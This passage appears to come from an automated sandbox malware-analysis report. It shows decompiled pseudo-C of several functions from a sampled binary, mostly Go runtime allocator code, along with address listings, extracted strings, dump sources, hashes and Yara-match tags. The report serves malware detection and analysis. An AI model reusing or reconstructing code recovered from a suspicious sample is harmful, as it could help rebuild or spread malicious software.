				E013325A0( *(_a8 + 0x38) & 0x0000ffff, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v24 = _t295;
				E01332340(_t296, _t298, _t303);
				E01332C40( *(_a8 + 0x3e) & 0x0000ffff, _t214, _t215, _t216, 0x13870b5, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
				E013325A0( *(_a8 + 0x3e) & 0x0000ffff, _t213, _t214, _t215, _t216, _t298, _t303);
				L013323C0(_t296, _t298, _t303);
				_v24 = _a8;
				E01332340(_t296, _t298, _t303);
				E01332C40( *(_a8 + 0x3e) & 0x0000ffff, _t214, _t215, _t216, 0x13870bd, _t279, _t298, _t303);
				L01332AA0(_t213, _t214, _t216, _v24, _t295, _t298, _t303);
				E013325A0( *(_a8 + 0x3e) & 0x0000ffff, _t213, _t214, _t215, _t216, _t298, _t303);
				return L013323C0(_t296, _t298, _t303);
			}















                                                                                                                            0x01306040
                                                                                                                            0x01306040
                                                                                                                            0x01306040
                                                                                                                            0x01306040
                                                                                                                            0x01306044
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01306559
                                                                                                                            0x01306559
                                                                                                                            0x01306560
                                                                                                                            0x01306565
                                                                                                                            0x0130604a
                                                                                                                            0x0130604e
                                                                                                                            0x01306053
                                                                                                                            0x01306058
                                                                                                                            0x0130605d
                                                                                                                            0x01306061
                                                                                                                            0x01306066
                                                                                                                            0x01306077
                                                                                                                            0x01306081
                                                                                                                            0x01306086
                                                                                                                            0x0130608b
                                                                                                                            0x0130609c
                                                                                                                            0x013060a1
                                                                                                                            0x013060b2
                                                                                                                            0x013060c0
                                                                                                                            0x013060c5
                                                                                                                            0x013060ca
                                                                                                                            0x013060db
                                                                                                                            0x013060e0
                                                                                                                            0x013060f1
                                                                                                                            0x01306100
                                                                                                                            0x01306105
                                                                                                                            0x0130610a
                                                                                                                            0x0130611b
                                                                                                                            0x01306120
                                                                                                                            0x01306131
                                                                                                                            0x01306140
                                                                                                                            0x01306145
                                                                                                                            0x0130614a
                                                                                                                            0x0130615b
                                                                                                                            0x01306160
                                                                                                                            0x01306171
                                                                                                                            0x01306180
                                                                                                                            0x01306185
                                                                                                                            0x0130618a
                                                                                                                            0x0130619b
                                                                                                                            0x013061a0
                                                                                                                            0x013061b1
                                                                                                                            0x013061c0
                                                                                                                            0x013061c5
                                                                                                                            0x013061ca
                                                                                                                            0x013061db
                                                                                                                            0x013061e0
                                                                                                                            0x013061f1
                                                                                                                            0x01306200
                                                                                                                            0x01306205
                                                                                                                            0x0130620a
                                                                                                                            0x0130621b
                                                                                                                            0x01306220
                                                                                                                            0x01306231
                                                                                                                            0x01306240
                                                                                                                            0x01306245
                                                                                                                            0x0130624a
                                                                                                                            0x0130625b
                                                                                                                            0x01306260
                                                                                                                            0x01306271
                                                                                                                            0x01306280
                                                                                                                            0x01306285
                                                                                                                            0x0130628a
                                                                                                                            0x0130629b
                                                                                                                            0x013062a0
                                                                                                                            0x013062b1
                                                                                                                            0x013062c0
                                                                                                                            0x013062c5
                                                                                                                            0x013062ca
                                                                                                                            0x013062db
                                                                                                                            0x013062e0
                                                                                                                            0x013062f1
                                                                                                                            0x01306300
                                                                                                                            0x01306305
                                                                                                                            0x0130630a
                                                                                                                            0x0130631b
                                                                                                                            0x01306320
                                                                                                                            0x01306331
                                                                                                                            0x01306340
                                                                                                                            0x01306345
                                                                                                                            0x0130634a
                                                                                                                            0x0130635b
                                                                                                                            0x01306360
                                                                                                                            0x01306371
                                                                                                                            0x01306380
                                                                                                                            0x01306385
                                                                                                                            0x0130638a
                                                                                                                            0x0130639b
                                                                                                                            0x013063a0
                                                                                                                            0x013063b1
                                                                                                                            0x013063c0
                                                                                                                            0x013063c5
                                                                                                                            0x013063ca
                                                                                                                            0x013063db
                                                                                                                            0x013063e0
                                                                                                                            0x013063f1
                                                                                                                            0x01306400
                                                                                                                            0x01306405
                                                                                                                            0x0130640a
                                                                                                                            0x01306414
                                                                                                                            0x0130641b
                                                                                                                            0x01306420
                                                                                                                            0x01306431
                                                                                                                            0x01306440
                                                                                                                            0x01306445
                                                                                                                            0x0130644a
                                                                                                                            0x01306457
                                                                                                                            0x01306460
                                                                                                                            0x01306471
                                                                                                                            0x01306480
                                                                                                                            0x01306485
                                                                                                                            0x0130648a
                                                                                                                            0x01306498
                                                                                                                            0x013064a0
                                                                                                                            0x013064b1
                                                                                                                            0x013064c0
                                                                                                                            0x013064c5
                                                                                                                            0x013064ca
                                                                                                                            0x013064d8
                                                                                                                            0x013064e0
                                                                                                                            0x013064f1
                                                                                                                            0x01306500
                                                                                                                            0x01306505
                                                                                                                            0x0130650a
                                                                                                                            0x01306518
                                                                                                                            0x01306520
                                                                                                                            0x01306531
                                                                                                                            0x01306540
                                                                                                                            0x01306545
                                                                                                                            0x01306558

                                                                                                                            Strings
                                                                                                                            • r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [, xrefs: 01306225
                                                                                                                            • r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) locke, xrefs: 013062A5
                                                                                                                            • cs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) ->, xrefs: 013064A5
                                                                                                                            • rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limi, xrefs: 0130606B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: cs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) ->$r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) locke$r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [$rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limi
                                                                                                                            • API String ID: 0-306986522
                                                                                                                            • Opcode ID: a647b83c42b85ec4ad8254faa1e116200addcd464e394672967bc89e388f3230
                                                                                                                            • Instruction ID: b98606bb4ef7b202a82bc359fa1b67c6110c07130291fb5d743d2505486de21d
                                                                                                                            • Opcode Fuzzy Hash: a647b83c42b85ec4ad8254faa1e116200addcd464e394672967bc89e388f3230
                                                                                                                            • Instruction Fuzzy Hash: 9DC13E36224B82C6D604FB69E09039FBB64FBE9B58F915461EE8E07734DF38C1848765
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AC8185 Relevance: 5.2, APIs: 4, Instructions: 216COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$AllocateHeap_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 106865790-0
                                                                                                                            • Opcode ID: da613b10c635bb53595de3890cf4312cf93c54fb4ceadec304ad535f12f7aa3f
                                                                                                                            • Instruction ID: 7f1a03c8ed2d4472f529bd03af496ebca6ddbafd9ffe04bea678e51e9d74a96e
                                                                                                                            • Opcode Fuzzy Hash: da613b10c635bb53595de3890cf4312cf93c54fb4ceadec304ad535f12f7aa3f
                                                                                                                            • Instruction Fuzzy Hash: 9D61A232318E084BEF5AEB289C597BD72D1FB99321F300959F44BC36A6DF34D9024699
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ABE1A0 Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3442832105-0
                                                                                                                            • Opcode ID: 1a5a18beb717bc35b45f0e5d1d5b8149514bbbff4660083c558cafeb3ce1d956
                                                                                                                            • Instruction ID: ad5a8ee27068fdb5bd0d95846bd9ed5f3bbf39812119b10dd886c07b046f03f5
                                                                                                                            • Opcode Fuzzy Hash: 1a5a18beb717bc35b45f0e5d1d5b8149514bbbff4660083c558cafeb3ce1d956
                                                                                                                            • Instruction Fuzzy Hash: D061D331608E488FEF45EF68DC89BAA73E5FB94315F10412AF44AC31A2DF34D9058B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AB4300 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: c706e39704bd44a9878f2aa0e02bcf58b57e69b0f9630ed7c1a844afd8d2510b
                                                                                                                            • Instruction ID: b6ae1a1fa0d565402ee9934260abbf7b520d59561d19a5900390f3baeda2276b
                                                                                                                            • Opcode Fuzzy Hash: c706e39704bd44a9878f2aa0e02bcf58b57e69b0f9630ed7c1a844afd8d2510b
                                                                                                                            • Instruction Fuzzy Hash: 5451B632218E054BEF59DF289C8927933D1FB85321F24456DF89BC3697EB30EC528698
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0130BB60 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E0130BB60(signed int __edx, signed int __rax, signed int __rbx, long long __rcx, long long __rbp, void* __r14, signed int _a8, signed long long _a16, long long _a24) {
				char _v8;
				long long _v16;
				signed int* _v24;
				long long _v32;
				signed int _v40;
				signed long long _v48;
				signed char _t60;
				void* _t64;
				signed int _t76;
				void* _t77;
				signed int _t83;
				intOrPtr _t86;
				signed long long _t95;
				signed long long _t98;
				long long _t103;
				long long _t105;
				signed int* _t106;
				signed int _t108;
				intOrPtr _t109;
				long long _t112;
				signed long long _t118;
				void* _t125;
				signed int* _t126;
				signed int* _t129;
				void* _t133;
				void* _t137;
				signed long long _t139;
				void* _t140;
				signed long long _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				L0:
				while(1) {
					L0:
					_t145 = __r14;
					_t130 = __rbp;
					_t103 = __rcx;
					_t95 = __rbx;
					_t83 = __rax;
					_t76 = __edx;
					if(_t133 <=  *((intOrPtr*)(__r14 + 0x18))) {
						goto L33;
					}
					L1:
					_v8 = __rbp;
					_t130 =  &_v8;
					if(__rax == 0) {
						L32:
						_t83 = 0x138b361;
						E01330BA0(0x138b361, _t95, _t130);
						goto L33;
					}
					L2:
					if(__rbx != 0) {
						L3:
						if((__rbx & __rbx - 0x00000001) != 0) {
							L31:
							E01330BA0(0x138db66, _t95, _t130);
							goto L32;
						} else {
							L4:
							_t82 = __rbx - 0x2000;
							if(__rbx > 0x2000) {
								L5:
								E01330BA0(0x138cedd, __rbx,  &_v8);
								goto L31;
							}
						}
					}
					L7:
					__eflags = _t83 - 0x10000;
					if(_t83 >= 0x10000) {
						L16:
						return E01313060(_t83, _t103, _t130);
					} else {
						L8:
						_a24 = _t103;
						_a8 = _t83;
						_v48 = _t95;
						 *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x30)) + 0xd8)) =  *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x30)) + 0xd8)) + 1;
						_t108 =  *((intOrPtr*)(_t145 + 0x30));
						_v32 = _t108;
						__eflags = _t108;
						if(_t108 == 0) {
							L11:
							_t64 = E01309600(0x14cf570, _t108, _t130, _t145);
							_t83 = _a8;
							_t105 = _a24;
							_t109 = _v32;
							_t95 = _v48;
							_t126 = 0x14cf578;
						} else {
							L9:
							_t129 =  *((intOrPtr*)(_t108 + 0xa0));
							__eflags = _t129;
							if(_t129 == 0) {
								goto L11;
							} else {
								L10:
								__eflags =  *_t129 & _t60;
								_t126 =  &(_t129[0x47c]);
							}
						}
						L12:
						_v24 = _t126;
						_t98 =  ~_t95;
						_v40 = _t98;
						_t118 = _t95 + _t126[2] - 0x00000001 & _t98;
						_t126[2] = _t118;
						__eflags = _t118 + _t83 - 0x40000;
						if(_t118 + _t83 > 0x40000) {
							L14:
							_t64 = E01313060(_t83, 0x14d10a0, _t130);
							_t106 = _v24;
							 *_t106 = _t83;
							__eflags =  *_t106;
							if(__eflags != 0) {
								goto L25;
							} else {
								L15:
								__eflags = _t106 - 0x14cf578;
								if(_t106 == 0x14cf578) {
									L29:
									E01309820(0x14cf570, _t130, _t145);
									goto L28;
								} else {
									L28:
									E01330BA0(0x138c496, 0x14d10a0, _t130);
									goto L29;
								}
							}
							do {
								goto L25;
							} while (__eflags == 0);
							_t106[2] = _v48 + 0x00000007 & _v40;
							_t83 = _a8;
							_t109 = _v32;
							_t126 = _t106;
							_t105 = _a24;
							goto L17;
							L25:
							_t86 =  *0x14cf460; // 0x25bf8a20000
							 *( *_t106) = _t86;
							asm("lock dec eax");
							_t76 = _t76 & 0xffffff00 | __eflags == 0x00000000;
							__eflags = _t76;
						} else {
							L13:
							__eflags =  *_t126;
							if( *_t126 == 0) {
								goto L14;
							}
						}
						L17:
						_t139 = _t126[2];
						_t141 = _t83 + _t139;
						_t126[2] = _t141;
						r9d =  *((intOrPtr*)(_t109 + 0xd8));
						_t34 = _t141 - 1; // -1
						r10d = _t34;
						 *((intOrPtr*)(_t109 + 0xd8)) = r10d;
						_t112 =  *_t126 + _t139;
						__eflags = r9d - 1;
						if(r9d == 1) {
							__eflags =  *((char*)(_t145 + 0xb1));
							if( *((char*)(_t145 + 0xb1)) != 0) {
								 *((long long*)(_t145 + 0x10)) = 0xfffffade;
							}
						}
						_v16 = _t112;
						__eflags = _t126 - 0x14cf578;
						if(_t126 == 0x14cf578) {
							_t64 = E01309820(0x14cf570, _t130, _t145);
							_t83 = _a8;
							_t105 = _a24;
							_t112 = _v16;
						}
						__eflags = _t105 - 0x14d10a0;
						if(_t105 != 0x14d10a0) {
							_t64 = E0132A040(E0132A040(_t64, _t105, _t83, 0x14d10a0, _t130, _t145), 0x14d10a0,  ~_a8, 0x14d10a0, _t130, _t145);
							_t112 = _v16;
						}
						L24:
						return _t64;
					}
					L34:
					L33:
					_a8 = _t83;
					_a16 = _t95;
					_a24 = _t103;
					E0135A8C0(_t76, _t77, _t82, _t95, _t103, _t125, _t130, _t137, _t140, _t142, _t143, _t144, _t146);
				}
			}





































                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb60
                                                                                                                            0x0130bb64
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130bb6a
                                                                                                                            0x0130bb6e
                                                                                                                            0x0130bb73
                                                                                                                            0x0130bb83
                                                                                                                            0x0130bde5
                                                                                                                            0x0130bde5
                                                                                                                            0x0130bdf1
                                                                                                                            0x00000000
                                                                                                                            0x0130bdf1
                                                                                                                            0x0130bb89
                                                                                                                            0x0130bb8c
                                                                                                                            0x0130bb8e
                                                                                                                            0x0130bb95
                                                                                                                            0x0130bdd0
                                                                                                                            0x0130bde0
                                                                                                                            0x00000000
                                                                                                                            0x0130bba0
                                                                                                                            0x0130bba0
                                                                                                                            0x0130bba0
                                                                                                                            0x0130bba7
                                                                                                                            0x0130bba9
                                                                                                                            0x0130bdcb
                                                                                                                            0x00000000
                                                                                                                            0x0130bdcb
                                                                                                                            0x0130bba7
                                                                                                                            0x0130bb95
                                                                                                                            0x0130bbb3
                                                                                                                            0x0130bbb3
                                                                                                                            0x0130bbb9
                                                                                                                            0x0130bc85
                                                                                                                            0x0130bc96
                                                                                                                            0x0130bbbf
                                                                                                                            0x0130bbbf
                                                                                                                            0x0130bbbf
                                                                                                                            0x0130bbc4
                                                                                                                            0x0130bbc9
                                                                                                                            0x0130bbd3
                                                                                                                            0x0130bbd9
                                                                                                                            0x0130bbdd
                                                                                                                            0x0130bbe2
                                                                                                                            0x0130bbe5
                                                                                                                            0x0130bc00
                                                                                                                            0x0130bc07
                                                                                                                            0x0130bc0c
                                                                                                                            0x0130bc11
                                                                                                                            0x0130bc16
                                                                                                                            0x0130bc1b
                                                                                                                            0x0130bc20
                                                                                                                            0x0130bbe7
                                                                                                                            0x0130bbe7
                                                                                                                            0x0130bbe7
                                                                                                                            0x0130bbee
                                                                                                                            0x0130bbf1
                                                                                                                            0x00000000
                                                                                                                            0x0130bbf3
                                                                                                                            0x0130bbf3
                                                                                                                            0x0130bbf3
                                                                                                                            0x0130bbf5
                                                                                                                            0x0130bbf5
                                                                                                                            0x0130bbf1
                                                                                                                            0x0130bc27
                                                                                                                            0x0130bc27
                                                                                                                            0x0130bc38
                                                                                                                            0x0130bc3b
                                                                                                                            0x0130bc40
                                                                                                                            0x0130bc43
                                                                                                                            0x0130bc4a
                                                                                                                            0x0130bc51
                                                                                                                            0x0130bc59
                                                                                                                            0x0130bc65
                                                                                                                            0x0130bc6a
                                                                                                                            0x0130bc6f
                                                                                                                            0x0130bc72
                                                                                                                            0x0130bc76
                                                                                                                            0x00000000
                                                                                                                            0x0130bc80
                                                                                                                            0x0130bc80
                                                                                                                            0x0130bd99
                                                                                                                            0x0130bd9c
                                                                                                                            0x0130bdb1
                                                                                                                            0x0130bdb8
                                                                                                                            0x00000000
                                                                                                                            0x0130bd9e
                                                                                                                            0x0130bd9e
                                                                                                                            0x0130bdaa
                                                                                                                            0x00000000
                                                                                                                            0x0130bdaa
                                                                                                                            0x0130bd9c
                                                                                                                            0x0130bd43
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130bd77
                                                                                                                            0x0130bd7b
                                                                                                                            0x0130bd80
                                                                                                                            0x0130bd85
                                                                                                                            0x0130bd88
                                                                                                                            0x00000000
                                                                                                                            0x0130bd43
                                                                                                                            0x0130bd46
                                                                                                                            0x0130bd4d
                                                                                                                            0x0130bd5a
                                                                                                                            0x0130bd5f
                                                                                                                            0x0130bd62
                                                                                                                            0x0130bc53
                                                                                                                            0x0130bc53
                                                                                                                            0x0130bc53
                                                                                                                            0x0130bc57
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130bc57
                                                                                                                            0x0130bc97
                                                                                                                            0x0130bc9a
                                                                                                                            0x0130bc9e
                                                                                                                            0x0130bca2
                                                                                                                            0x0130bca7
                                                                                                                            0x0130bcae
                                                                                                                            0x0130bcae
                                                                                                                            0x0130bcb2
                                                                                                                            0x0130bcb9
                                                                                                                            0x0130bcc0
                                                                                                                            0x0130bcc4
                                                                                                                            0x0130bcc6
                                                                                                                            0x0130bcce
                                                                                                                            0x0130bcd0
                                                                                                                            0x0130bcd0
                                                                                                                            0x0130bcce
                                                                                                                            0x0130bcd8
                                                                                                                            0x0130bce4
                                                                                                                            0x0130bce7
                                                                                                                            0x0130bcf2
                                                                                                                            0x0130bcf7
                                                                                                                            0x0130bcfc
                                                                                                                            0x0130bd01
                                                                                                                            0x0130bd01
                                                                                                                            0x0130bd0d
                                                                                                                            0x0130bd10
                                                                                                                            0x0130bd2c
                                                                                                                            0x0130bd31
                                                                                                                            0x0130bd31
                                                                                                                            0x0130bd36
                                                                                                                            0x0130bd42
                                                                                                                            0x0130bd42
                                                                                                                            0x00000000
                                                                                                                            0x0130bdf7
                                                                                                                            0x0130bdf7
                                                                                                                            0x0130bdfc
                                                                                                                            0x0130be01
                                                                                                                            0x0130be06
                                                                                                                            0x0130be15

                                                                                                                            Strings
                                                                                                                            • persistentalloc: align is not a power of 2runtime: blocked write on closing polldescunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinter, xrefs: 0130BDD0
                                                                                                                            • persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= shrinking stack in libcallstartlockedm: locked to meuse of invalid sweepLocker not in stack roots range [CertEnumCertificatesInStoreEaster Island Standard T, xrefs: 0130BDE5
                                                                                                                            • persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=traceback did not unwind completelytransport endpoint is not connected) is larger than maximum page size () is not Grunn, xrefs: 0130BDBF
                                                                                                                            • runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from different packages)CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyWSAGetOve, xrefs: 0130BD9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: persistentalloc: align is not a power of 2runtime: blocked write on closing polldescunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinter$persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=traceback did not unwind completelytransport endpoint is not connected) is larger than maximum page size () is not Grunn$persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= shrinking stack in libcallstartlockedm: locked to meuse of invalid sweepLocker not in stack roots range [CertEnumCertificatesInStoreEaster Island Standard T$runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from different packages)CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyWSAGetOve
                                                                                                                            • API String ID: 0-2789303706
                                                                                                                            • Opcode ID: 9ad4976b388e7791bdf19bd70da9cdec7523b899339accf84b277bab2e5ec9a5
                                                                                                                            • Instruction ID: 2eccd90706c6bb6604de6dfc1854288eb8114e56900cb8785b6358d5cc5a36b2
                                                                                                                            • Opcode Fuzzy Hash: 9ad4976b388e7791bdf19bd70da9cdec7523b899339accf84b277bab2e5ec9a5
                                                                                                                            • Instruction Fuzzy Hash: 93615376605B8582DA12DF09E49039AFBA5F389BD8F849122EB8D13B69DF38C585C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01336F40 Relevance: 5.2, Strings: 4, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E01336F40(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, long long __rdx, void* __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, void* __r12, void* __r13, void* __r14, void* __r15, long long _a8, signed int _a16) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t59;
				signed int _t63;
				void* _t64;
				void* _t71;
				void* _t73;
				void* _t80;
				void* _t86;
				signed int _t87;
				void* _t91;
				intOrPtr _t92;
				void* _t93;
				void* _t94;
				long long _t99;
				intOrPtr _t112;
				intOrPtr _t114;
				long long _t120;
				intOrPtr _t121;
				intOrPtr _t123;
				long long _t125;
				void* _t127;
				intOrPtr _t128;
				void* _t133;
				void* _t138;
				void* _t139;
				intOrPtr _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				L0:
				while(1) {
					L0:
					_t146 = __r15;
					_t145 = __r14;
					_t144 = __r13;
					_t143 = __r12;
					_t142 = __r11;
					_t141 = __r10;
					_t139 = __r9;
					_t138 = __r8;
					_t129 = __rbp;
					_t127 = __rsi;
					_t124 = __rdx;
					_t103 = __rax;
